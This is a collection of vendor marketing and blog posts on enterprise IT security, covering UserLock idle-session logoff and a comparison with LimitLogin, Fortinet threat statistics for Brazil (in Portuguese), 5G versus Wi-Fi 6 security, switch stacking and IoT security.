Force Remote Logoff after Idle Time

Resolving Optimization and Security Issues

Fast and fluid access to shared workstations is key to their utility, but managing this access can be a challenge. Whether its call center agents, hospital clinicians, reception desks or student computer labs, the problem is often the same. Users log in and never log off. They simply lock the workstation and walk away. Once you have multiple users just clicking ‘Switch User’ to login, there are enough random applications running in the background from all these idle users, to slow the system to a crawl.

Worse still, rather than locking, they just leave their session open. Forgotten sessions left open on shared workstations means user accounts are now at risk (high risk!) of being compromised.

Securing Shared Workstations

As an entry point to an organization’s information resources, it’s paramount to ensure that these shared workstations have the best security configuration.

With UserLock, IT administrators can set an automatic forced logoff, on all locked or open machines, after a certain idle time. This includes remote desktop sessions opened by the domain user. Access to data and resources is now better secured, resources freed up and time saved for IT from having to deal with various issues.

Video Transcription

In this video I’m going to show you how UserLock can be configured to allow you to automatically log off, lock machines, after an idle time.

So the first thing we need to do is make sure that on the target machines we have the screen saver option “on resume display logon screen”.

This can be enabled through a Microsoft GPO setting.

Back in the UserLock console we’re going to go to the properties of the agent distribution and here we’re going to check to “consider screen saver time as locked time”, that way in Userlock we can recover the events as a locked session.

windows server automatic logoff after inactivity

Click here to apply the new setting and this will be effective on the target machines at the next reboot or we can force it to be effective immediately by restarting the UserLock agent service on the target machine.

So once you’ve done that setting we need to now select the user accounts for which we’d like this setting to be enabled.

So we’re going to protect a new account, we can do this at the user, group or OU level. I’m going to do this for Active Directory group “everyone”.

I create my protected account and then by simply double-clicking on the protected account I have access to the properties and all of the settings and restrictions that I can set for this protected account.

So we’re going to go down to hour restrictions and here we have “Maximum locked time”. So once the screensaver has been enabled, we’re going to put in the amount of time that we will allow the computer to be locked before we force a logoff. So for example we can put 10 minutes.

maximum locked time logoff after inactivity

By default the end user is going to receive a logout notification, that’s by default one minute before the log off. If we’d like to allow a little bit more time – if they’d like to bypass the logoff – we can change that here. So we can apply these settings.

So that’s it that’s how we can configure a forced logoff of computers that are open after a certain amount of idle time to free up workstations and to reduce unnecessary use of resources on your network.


  • The ‘Session’ options are supported by interactive session types (workstation and terminal).
  • The logoff initiated by these options is forced. Any unsaved documents will be lost.

A UserLock Case Study

Read how the Architectural Technology Department of the NYCCT (New York City College of Technology) stopped forgotten Windows sessions to secure their network and free up resources.

Going further with UserLock

Direct from the console, UserLock can interact remotely with any session, at any time. This includes a forced logoff to several machines at once or blocking a user with a single click.

Other use cases that involve managing user logins can be found here.

A Free Fully Functional 30 Day UserLock Trial

Don’t take our word for it, Download now the fully functional free trial and see for yourself how easily UserLock can bring a new level of security to your Windows Server Network.

LimitLogin vs UserLock

This blog post reviews how LimitLogin and UserLock limit concurrent user logins in an Active Directory domain.

It will focus on the concurrent connection restriction feature provided by each solution and discuss how else they help an organization secure user access for Windows Active Directory environments.



LimitLogin is an unsupported tool that was released in 2005. It was written by a Microsoft Partner Technology specialist and an Application Development Consultant. The aim of LimitLogin was to add the ability to track and limit concurrent workstation and terminal user logins in an Active Directory domain.


UserLock is an enterprise software solution that controls, audits and monitors user access to an Active Directory network. UserLock permits, denies or limits access based on a range of criteria; for example, preventing concurrent logins via a single identity, limiting access to certain device types and limiting network access methods. UserLock also monitors all sessions in real time providing alerts and information to respond to suspicious events and a log of access information for audit and forensics.

UserLock is developed by IS Decisions, a Microsoft Partner company founded in 2000, that specializes in solutions to safeguard and secure Microsoft Windows and Active Directory infrastructure.

Download NOW a fully functional Free Trial of UserLock. 30-day full version with no user limits

LimitLogin vs UserLock. A comparison

Agent TechnologyLogon ScriptsWindows Service*
AD schema modificationYesNo
Web Server requirementYesNo
Supported Workstation OSWindows 2000 SP4, Windows XP SP1Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Supported Server OSWindows Server 2003, Windows Server 2008Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, Windows Server 2016
64-bit OS supportNoYes
Client AgentYesYes
Integrated deployerNoYes
Workstation SessionsYesYes
Terminal SessionsYesYes
Wi-Fi SessionsNoYes
VPN SessionsNoYes
IIS SessionsNoYes
Logon and logoff events auditYesYes
Lock and unlock events auditNoYes
Limit by UserYesYes
Limit by GroupNoYes
Location restrictionsNoYes
Time connection restrictionsNoYes
Time Quota featuresNoYes
Customizable MessagesNoYes
E-mail notificationsNoYes
Pop-up notificationsNoYes
Database of session activitiesNoYes
Printable and customizable reportNo : Only CSV / XMLYes
Supported solutionNo, even by its provider MicrosoftYes, by its editor IS Decisions

Windows Service*: Except for old Windows XP and 2003 Server for which the micro agent technology is a GINA DLL.

Requirements and Specifications

LimitLogin is not compatible with Windows Server 2008R2, 2012 and 2012R2.

UserLock is certified for compliance and support with Windows Server 2016, 2012, 2012R2, 2008 and 2008R2.

LimitLogin doesn’t support 64-bit systems. UserLock does.

Similar to the status of the resource kit tools and/or the support tools, LimitLogin is not officially supported by Microsoft.

  • Windows Server Operating Systems
LimitLogin UserLock - Windows Server Operating Systems
  • Windows Workstation Operating Systems
LimitLogin UserLock - Windows Workstation Operating Systems

Limited Session Types with LimitLogin

LimitLogin capabilities are limited to monitoring only workstation and terminal sessions. UserLock on the other hand takes into consideration access from all session types (workstations, terminal, interactive, Internet Information Services and Wi-Fi/VPN). Learn more

  • Audited and Protected User Session Types
LimitLogin UserLock - Audited and Protected User Session Types

Architecture & Deployment

A summary comparing the architecture required to monitor and limit the number of workstation and terminal logins:

The architecture is built around 3 main elements:
– A Web service that handles the back-end processing on the server.
– An application directory partition that holds the login information.
– Login and logoff VBS scripts.
A client/server application:
– A UserLock Server on a Windows server.
– A Micro-agent on protected machine.
– Optionally a SQL Server
LimitLogin requires creating a new partition in Active Directory on a Windows Domain Controller.UserLock can be installed on any server member of the network.There is no requirement to use a Domain Controller Server.
LimitLogin performs an Active Directory Schema modification. This operation is irreversible and cannot be cancelled.It doesn’t perform any Active Directory modification.
LimitLogin requires logon and logoff scripts.The micro-agent can then be automatically deployed through the UserLock console or as a MSI package.
It requires a Web server set up to do delegated Kerberos Authentication for scripts communication and rules processing.Encrypted communication between the server and agents requires only Ping and Microsoft File and Printer sharing protocols.
Login sessions information is stored in files that are not encrypted.Sessions Activities are stored in a database that can be a SQL Express or Server Edition (A free database is provided).

Deploying LimitLogin

Microsoft LimitLogin was designed to help administrators to apply login limits on their network. It is however complex to implement and unsafe due to the Active Directory Schema modification it requires.

Bill Boswell (Microsoft Certified Professional Magazine) wrote this very meticulous and precise breakdown on how to deploy LimitLogin:

“LimitLogin requires a bit of effort to deploy. For one thing, it performs a Schema modification. For another, it creates a new partition in Active Directory. It also requires configuring a Web server with the .NET Framework and ASP.NET and setting it up to do delegated Kerberos authentication. Finally, it requires distributing client packages that support communicating with the Web server via SOAP (a lightweight protocol for exchanging structured information in a distributed environment). Whoa. Don’t stop reading. It’s complicated, but not impossible. Really.”

Deploying UserLock

UserLock installs in minutes on a standard Windows Server. The installation can be done on any server member of the domain. There is no requirement to use a Domain Controller server. Once installed, UserLock must deploy a micro agent onto each workstation that are members of the selected network zone. This can be done through the UserLock console which contains an agent deployer with manual or automatic modes. UserLock reads Active Directory information but doesn’t modify anything regarding accounts nor schema.

Download NOW a fully functional Free Trial of UserLock. 30-day full version with no user limits

The need to manage Concurrent connections

Most organizations that work in a Windows environment use Microsoft Active Directory to authenticate and control all users. However, Active Directory is by no means a full proof security solution. Yes it manages passwords and confirms that the user name matches the password, but it does not stop multiple users from logging on with the same password, at the same time.

This challenge of limiting concurrent logins in a Windows environment averts one of the most potentially dangerous situations for a Windows Active Directory network.

Preventing or limiting concurrent sessions:

  •  Stops users sharing their passwords. Users will think twice about sharing credentials, as they won’t be able to get on the system if someone else is logged in too
  •  Stops rogue users from using valid credentials at the same time as their legitimate owner
  •  Ensures access to critical assets is attributed to individual employees
  •  Is required for an information system to comply with major regulatory constraints, including NIST 800-53, SOX, PCI-DSS, HIPAA and the newly updated CJIS requirements.

Further Restrictions needed to Manage Network Access

The application LimitLogin allows an organization to manage only the number of user logins.

With UserLock, concurrent login control is just one part of a granular access control policy. UserLock sets and enforces login control based on multiple criteria in a matrix of access rules; that is set according to user, user group or organizational unit.

Control from where a protected account may logon. Restrict domain users to workstation or device, IP range, department, floor or building. Learn more

Control the hours and days when protected users can logon onto the network. Define working hours and/or maximum session time. Learn more


Microsoft LimitLogin was a free tool to help administrator in the past to apply login limits on their network. It was however complex to implement and unsafe due to the Active Directory Schema modification it required.

In today’s world, LimitLogin is unable to meet the critical needs of many organizations. Operating systems which have appeared during the past six years are not supported, only the number of user sessions can be controlled – no further restrictions by location or time, and it is limited to only workstation and terminal sessions.

Defining and enforcing a full User Access Policy to ensure the security of your network access and the protection of your data require the consideration of more context variables.

The number of simultaneous accesses is not sufficient. You need to know, analyze and control who, how, when, how many times and from where an access to an enterprise network is requested, whether this request is done on a machine, through the VPN, thanks a wireless connection or by a web application or an Intranet.

UserLock answers to these needs with an effective network access management tool that is very simple to manage and easy to use. A customized access policy can be set and enforced to permit or deny user logins. Concurrent sessions can be prevented and access restricted to specific workstations or devices, time, business hours and connection type (including Wi-Fi).

Download NOW a fully functional Free Trial of UserLock. 30-day full version with no user limits

Case Study: Bank of Cyprus reduces security risks from internal users with UserLock

Disclaimer: The comparison juxtaposes the features of IS Decisions UserLock and LimitLogin based on the publicly available information as of February 11, 2014.

Brasil sofreu 15 bilhões de tentativas de ataques cibernéticos no segundo trimestre de 2019

A Fortinet, líder global em soluções completas, integradas e automatizadas de segurança cibernética, anunciou os resultados de sua mais recente pesquisa sobre ameaças, revelando que o Brasil sofreu 15 bilhões de tentativas de ataque cibernético em apenas três meses, entre março e junho de 2019. O serviço de inteligência contra ameaças da Fortinet, FortiGuard, detectou a prevalência de ataques antigos como os usados no ransonware Wannacry em 2017 e aqueles que violaram seriamente os bancos no Chile e no México em 2018. A eficácia desse tipo de ataque indica a presença ainda existente de sistemas não corrigidos ou atualizados em empresas brasileiras e a necessidade crítica de maior investimento em tecnologias de segurança cibernética.

De acordo com Frederico Tostes, Country Manager da Fortinet no Brasil: “A segurança cibernética passou de um elemento complementar para uma necessidade crítica para todas as empresas em seu processo de transformação digital. A questão não é mais “o que fazemos se sofrermos um ataque cibernético?”, mas seria “o que fazemos quando sofremos um ataque cibernético?”. Atualmente, a segurança cibernética é uma questão global e o Brasil também ocupa um lugar importante no mundo como um alvo para os criminosos cibernéticos. Vemos ameaças que aumentam em um ritmo alarmante, tanto em quantidade quanto em sofisticação”.

Os resultados da pesquisa FortiGuard foram apresentados no âmbito do Fortinet CiberSecurity Summit (FSC19), evento que reuniu 1.000 especialistas em segurança de rede de diversas áreas de São Paulo para discutir os principais perigos digitais chaves da atualidade, o panorama de riscos nos próximos anos e como profissionais e empresas podem se preparar para esses novos tipos de ataques. Os resultados mais proeminentes incluem:

• Antigas e conhecidas ameaças permanecem muito ativas no Brasil

o DoublePulsar, o troiano usado para distribuir malware em ataques reconhecidos como o ransomware Wannacry em 2017 e ataques a bancos no Chile e no México no ano passado, esteve entre os três mais detectados no Brasil no segundo trimestre de 2019.

• Grande número de tentativas de exploit de aplicativos para negação de serviços

o Cerca de 73% das tentativas de intrusão em redes detectadas no Brasil exploraram uma vulnerabilidade que permite ativar um comando para gerar ataques por negação de serviços em servidores NTP (Network Time Protocol é um protocolo da Internet para sincronizar os relógios de sistemas de computadores através de roteamento de pacotes em redes).

• O malware que afeta o Windows e é usado para “criptomineração”

o Cerca de 33% do malware detectado no Brasil foi um “verme” com características de troiano que afeta computadores com o sistema operacional Windows. Pode ser considerado um ataque sério se você não tiver um antivírus atualizado.

o Além disso, o malware CoinHive, usado para “criptomineração” de Bitcoin, foi o segundo mais detectado no Brasil durante o segundo trimestre do ano.

• Dispositivos de IoT continuam sob a ameaça do botnet Mirai

o Desde seu lançamento em 2016, o botnet Mirai, que ataca dispositivos IoT continua registrando uma explosão de variantes e atividades. Classificados em segundo lugar no Brasil, os criminosos cibernéticos continuam a usar o Mirai como uma oportunidade para assumir o controle desses dispositivos.

“A segurança cibernética é uma questão com a qual temos que lidar como prioridade. É necessário repensar a segurança de forma abrangente para estarmos melhor preparados para prevenir, detectar e responder automaticamente às ameaças”, acrescentou Tostes. “Aumentar a conscientização sobre os riscos, promover o treinamento abrangente de jovens profissionais, ajudar na adaptação a novas regulamentações, como a Lei Geral de Proteção de Dados, e continuar a focar em assessorar o mercado com nossos especialistas e através de nossa rede local de parceiros de canais, é prioritário para a Fortinet no Brasil”.

A Fortinet é a empresa de segurança cibernética número um no Brasil, com o maior número de dispositivos de segurança entregues no país, contando com 50,12% de participação nos mercados de firewall, gerenciamento unificado de ameaças, detecção e prevenção de intrusões e redes privadas virtuais (dados do IDC).

A arquitetura de segurança avançada, juntamente com uma equipe de especialistas, permite que a Fortinet ajude as organizações brasileiras a acelerar sua transformação digital sem comprometer a segurança. A capacidade do Fortinet Security Fabric de proteger todos os pontos da rede oferece aos clientes a proteção integral contra ameaças que é necessária para enfrentar os desafios da segurança cibernética em constante evolução.


Comparing 5G to Wi-Fi 6 from a Security Perspective

Enterprise-grade Wi-Fi systems have proven to be secure for thousands of demanding customers across virtually all industries. With the recent hype around 5G and service providers promoting 5G as an alternative to Wi-Fi in the enterprise, it pays to understand how 5G security stacks up against Wi-Fi security.

Understanding 5G and Wi-Fi Security

Cellular security has improved with each generation. The security of first-generation analog cellular systems, based on the AMPS (Advanced Mobile Phone System) standard, was essentially non-existent. These calls were unencrypted and could be intercepted with basic scanners. The security of currently deployed LTE networks is far better. LTE uses strengthened encryption and an authentication algorithm (“AKA”) that shares a key between the client and the receiving base station. But while LTE security is solid, it isn’t perfect.

According to researchers at Purdue and the University of Iowa, LTE is vulnerable to some types of cyberattacks, including data interception and device tracking. The Associated Press last year reported the US Department of Homeland Security (DHS) has acknowledged the existence in Washington, DC of cell site simulators, called “Stingrays,” that could track cellular devices, intercept calls, and potentially even plant malware. 5G security improves upon LTE security incrementally, with identical encryption, slightly hardened authentication, and better key management. But overall, 5G security is largely comparable to LTE security.

Just as cellular security has improved, Wi-Fi security has evolved with each generation. Early Wi-Fi networks, beginning in the late 90s, used weak encryption and authentication, called “WEP”. The subsequent WPA and WPA2 standards feature improved encryption. Authentication with WPA2 can be either enterprise-grade 802.1X, or weaker PSK (pre-shared key), which hackers could potentially break by running through possible passwords until they can confirm the WPA2 handshake using a guessed password. This is called a Dictionary Attack. For this reason, most of our enterprise customers implement WPA2 with 802.1X, which is not prone to dictionary attacks. While some people claim Wi-Fi is insecure, pointing to poorly implemented networks that deactivate all password protection (e.g., a local coffee shop), this is not representative of enterprise practices. Still, the Wi-Fi industry developed WPA2 15 years ago, at a time when the wireless, computing, and security landscapes were substantially different.

Recently, the Wi-Fi Alliance standards body responded with WPA3—a significant update to Wi-Fi security. Aruba is a leader in the development of WPA3. WPA3 implementations fall into one of three categories: (1) OWE (“Enhanced Open”), which encrypts traffic to prevent snooping attacks on open networks that do not have password protection, (2) WPA3-Personal, which uses a shared-secret and a cryptographically stronger key exchange that is resistant to dictionary attacks, and (3) WPA3-Enterprise, which significantly strengthens enterprise-grade 802.1X and optionally includes the same Suite B/CSNA crypto algorithms used for Top-Secret or higher classified government networks. Unlike 5G, which is not backward-compatible and requires completely new handsets and radio networks, customers can upgrade the software on most of Aruba’s currently deployed Wi-Fi networks to include WPA3 (unless they are implementing Suite B/CNSA). We expect major handset OS vendors, such as Apple and Google, to roll out WPA3 and Enhanced Open by the end of 2019. WPA3 certification will be mandatory for all new Wi-Fi 6 equipment starting later this year.

It’s also worth noting that cellular encryption generally has lagged Wi-Fi encryption. For example, LTE encryption is based on an algorithm that uses a 64-bit key length, while WPA2-AES encryption, part of Wi-Fi since 2004, uses 128-bit encryption. 5G uses 128-bit encryption and may, in a future release of the 5G standard, upgrade to 256-bit encryption. Wi-Fi already supports 256-bit encryption through the Suite B/CNSA extensions of WPA3.

Until this point, we’ve highlighted the evolution and current state of authentication, encryption, and key management for cellular and Wi-Fi standards. These are important security design elements. But it’s also important to consider a customer’s ability to tailor its networks to suit its needs by applying specific security and compliance tools and policies. The average security buyer at a large enterprise uses more than 50 different security and compliance tools, and no two organizations have exactly the same needs. Our customers have been successfully deploying their chosen security and policy tools to enterprise Wi-Fi networks for decades. The architecture of these networks is flexible and allows customers to break out, analyze, and apply policy to traffic. Wi-Fi 6 and WPA3 completely retain this flexibility.

5G is a different story. If an enterprise wants to replace Wi-Fi with 5G, there are a few different approaches. Each has implications for security customization.

  • The first approach is to extend macro 5G service into the enterprise using DAS (Distributed Antenna Systems) or small cells. With this approach, it is difficult to break out traffic and implement specific security solutions. In other words, you get what you get.
  • If your company is large enough, and your service provider is willing to sell and manage an individualized Network Slice, you could buy a slice specific to your company. Network slicing enables carriers to create customized virtual network overlays under one nationwide, physical network. With slicing, they can tune each of these virtual networks to serve business cases that require specific network characteristics. Your service provider may sell a low-latency network slice, or an IoT-oriented network slice. You could then have the service provider apply specific security solutions to that slice and possibly even manage it for you, as a part of their network. But all traffic passing over such a slice would be invisible to security appliances that are wired directly into an enterprise network.
  • Your enterprise could choose to deploy a private 5G network on your premises, using either spectrum licensed from a service provider, or possibly other spectrum that is unlicensed (e.g., CBRS spectrum). You can apply security to a private 5G network in a similar way you can apply it to an enterprise Wi-Fi network, but this requires investing in completely separate, parallel network infrastructure. Consequently, this approach will likely be limited to very specific enterprise use cases.

Security is not a monolithic consideration. It includes elements like authentication, encryption, and key management. For well-designed and deployed networks, we believe these elements for Wi-Fi 6 are equal to, or better than, 5G. An equally important consideration is the ability of an enterprise to apply the specific security and policy tools to their network in a flexible way, tailored to its needs. Wi-Fi enterprise networks are highly flexible, as they always have been. But depending on the deployment approach for a 5G network, it may or may not be able to accommodate the level of security and compliance customization required by enterprise customers.

Aruba Executive Perspectives on 5G and Wi-Fi 6
Jeff Lipton: Making Sense of 5G and Wi-Fi in the Enterprise

Stuart Strickland: What is 5G?

Stuart Strickland: Wi-Fi as the On-Ramp to 5G


Stacking Network Switches: Why and Why Not

What are Stackable Switches?
In networking, the term “stack” (or stackable) refers to a group of physical switches that have been cabled and grouped in one single logical switch. Over the years, stacking features have evolved from a premium (and costly feature) to a core capability of almost all enterprise-grade switches (and also in several SMB models).

A stack of switches (in this example Aruba 3810 Switch Series)

It’s the opposite approach of a modular switch, where you have a single physical chassis with several slots and modules to grow your switch, used typically, at least in the past, in core switches.

A modular switch (in this example: Aruba 8400 Switch Series)

Both can provide a single management and control plane or at least a single configurable logical switch, with some kind of redundancy if you lose a physical switch or a module.

Having a single logical switch, with better reliability, makes it easy to translate the logical network topology in physical topology.

What are Stacking Technologies?
In stackable switches, the stack is usually built with cables that connect all the switches in a specific topology.

Those cables are connected to specific posts of the switches, depending on the type of stacking:

  • Backplane stacking (BPS), where specific stacking modules (usually on the back of the switch) are used with specific cables (depending on the vendor).
  • Front-plane stacking (FPS)-VSF, where usually are used standard Ethernet ports to build the stack, using standard Ethernet cables.

The stacking topology also define the resiliency of the stacked solution, you can have typically different kind of cabling options (depending on the switch vendor and models):

  • Daisy chain or bus is not usually used because it does not provide resiliency
  • Ring or redundant dual ring provide resiliency, but with more than two switches the packet paths can be not optimal
  • Mesh or full mesh provide higher resiliency and also optimal packet paths

For example, the Aruba 3810 Switch Series uses a dedicated stack module (on the back) and supports all those topologies (the ring topology only with a single ring).

In the ring topology you can have up to 10 stack members:

Aruba 3810 Switch Series stacking: Ring topology

In the mesh topology you can have up to five stack members:

Aruba 3810 Switch Series stacking: Mesh topology

Why Use Stacking?
One of the major benefits of using stacking (depending on the vendor) is the logical switch view with a single management interface, which  makes the management and operational tasks very easy.

It also provides link aggregation capability between ports of different physical switches in the same stack, providing better bandwidth and resiliency for the downstream links, and simplifying network design implementation, where “multiple cables” across switches are just one single logical link (using LAG, LACP, EtherChannel or any link aggregation solutions).

Compared to the modular switch option, stackable switches provide a less expensive option (especially for SMB use cases), but with similar scalability and usually with better flexibility. Resiliency and performance can be different (worse or better) depending on the implementation.

With regards to flexibility, you can usually mix a combination of different port speed and media types, but also mix different models of switches with also different capabilities (for example, some switches with PoE functions).

Talking about performance, stacking switches doesn’t not necessary means increase the performance. This depends on the stacking cables’ bandwidths and the stacking topology.

Why Shouldn’t You Use Stacking?
The stackable switch market is very mature and relatively stable. However, each vendor adds its unique set of features and functionalities. Different vendors utilize different types of connectors, cables and software for their stackable switches. This causes requirements to use the same product line of switches to take advantage of stacking (not necessarily the same model, because, for example, in Aruba 3810 Switch Series you can mix different models in the same stack).

And there are other potential disadvantages when you use stacked switches:

  • Performance: For SMB use cases, the stack ports and cable speed are enough to provide high bandwidth and low latency. But when speed increases or the stack expands (unless you use a mesh topology) you may increase the latency and decrease the overall performance.
  • Resiliency: Depending on the stacking topology, if you have some faults your overall stack may not be operating correctly anymore. So be sure to choose the best topology and ensure higher resiliency on each stack member. For example, using dual power supplies to ensure hardware redundancy. The single management or control plane may also reduce the overall resiliency, but the problem is similar also on modular switches.
  • Manageability: The single management interface is great, but there are also some drawbacks. First, expanding an existing stack could cause a service disruption for an extended period, such as when all the switches are rebooted to add a stack member or from a power failure. Second, removing a switch from a stack could be tricky or require a complex process. Last but not least, upgrading the firmware on all the stack members, in most cases, requires a complete reboot of all the switches.

Stacking Evolution
To increase the resiliency of stacked switches, there are different solutions based on the concept of a “virtual chassis” with separated management and control planes. Usually, those solutions are implemented on high-end switch models.

Each vendor has its proprietary solution, but for example, on the Aruba 8320 Switch Series (or the Aruba 8325 Switch Series) you can use the Aruba Virtual Switching Extension (VSX).

Related Content
Aruba Switches Series Overview

Configuring an Aruba Switch Stack on Aruba Central

Aruba OS Switch Stacking for Airheads

Blog: Network Security on Modern Switches


Do Something About IoT Security Fears

In a report from the NASA Office of Inspector General, hackers gained access to the NASA’s Jet Propulsion Laboratory network and stole roughly 500MB of data relating to the Mars Missions. The point of entry? A simple Raspberry Pi device that you could buy from Amazon that is under 100 USD.

As security professionals, we’re well aware of the risk of IoT devices. Yes, the attack surface has expanded. Yes, there’s a host of unknown vulnerabilities. Yes, device manufacturers don’t always design their products with security top-of-mind. Yes, it’s difficult or impossible to run security agents on IoT devices.

But this isn’t the first time we’ve faced down security challenges. As security professionals, we dealt with the influx of mobile devices. Before we overcame the sky-is-falling challenges of BYOD, we secured laptops, desktops, servers and all sorts of endpoints. And we’ll secure IoT devices, too.

3 Steps to Improving IoT Security
Securing IoT devices comes down to three simple steps:

1. Accurately identify what’s on your network. It may seem obvious, but most network operators simply don’t know the details about every device that’s connected to both their wired and wireless networks, and IoT makes it even more challenging. Battery-powered IoT devices can be especially problematic, because they may wake up only briefly to a perform a function or to check-in—which means they’re popping on and off the network all day.

You need visibility into what these devices are, who is operating the devices, and what they’re doing all day. To get that visibility for IoT, it’s necessary to expand beyond traditional methods of fingerprinting. Innovations like machine learning and deep packet inspection are simplifying the challenge. Machine learning can be used to analyze device attributes and automatically group similar devices together. Deep packet inspection can be used to provide additional context and behavioral information to accurately identify hard-to-detect devices.

2. Enforce policy automatically. You need closed-loop, end-to-end access control from the moment a device joins the network. Given the sheer quantities of IoT devices, automation is necessary. Manual intervention is no longer practical. Develop policies that leverage context, such as the user role, device type, certificate status, location or day of week. When an IoT device joins a network, it can be automatically segmented, keeping traffic separate and secure, with the policy consistently enforced across wired and wireless networks.

3. Monitor for suspicious behavior. Context is critical to understanding what an IoT device is doing. You need to understand the actual behavior of a device—what protocols are being used, what applications and URLs are being accessed. If a security camera begins sending huge amounts of data at 3am outside the country, for example, you need the ability to automatically quarantine it until you can investigate, fix or replace it.

Banish the Fear with Good Planning
With a good plan and effective tools, you can mitigate the risks of IoT devices while enabling your organization to benefit from their many gains, whether that is improved physical security, monitoring equipment on the factory floor, or automatically adjusting the building’s temperature and lighting for employee comfort and to save energy.

Learn how Aruba ClearPass Device Insight can help you tackle your IoT security challenges.


Fortinet – Solução Secure SD-Branch

A Fortinet anunciou sua solução Secure SD-Branch, a mais abrangente do setor para empresas distribuídas, que protege a borda de acesso e WAN e permite redes guiadas pela segurança em organizações distribuídas. A solução Secure SD-Branch da Fortinet amplia o Fortinet Security Fabric e os benefícios da SD-WAN para o acesso à rede, convergindo WAN e segurança em uma plataforma integrada. Essa convergência aumenta a segurança e a visibilidade, diminui a complexidade, melhora o desempenho e a agilidade e reduz os custos gerais de TI relacionados à borda da rede.

Ler mais

Commvault é eleita pela HPE como parceira tecnológica do ano para soluções de armazenamento

A ampla integração das soluções de gerenciamento e proteção de dados da Commvault com o armazenamento e o portfólio de servidores da HPE capacita as empresas a simplificar a prontidão de recuperação, a nuvem com responsabilidade e a ativar dados, gerando valor aos negócios.

Ler mais

Why SMBs believe their data is unsafe in the cloud

Two thirds (61%) of small to medium-sized businesses (SMBs) believe that their data is unsafe in the cloud, with almost a third (29%) saying that they have suffered a breach since moving to the cloud for storage.

Ler mais

Aruba ClearPass, Access Point Updates Tear Down IoT Security, Connectivity Barriers

Aruba unleashed a new ClearPass offering and series of access points to help enterprises and channel partners wrangle Internet of Things (IoT) endpoints and mobile devices.

Ler mais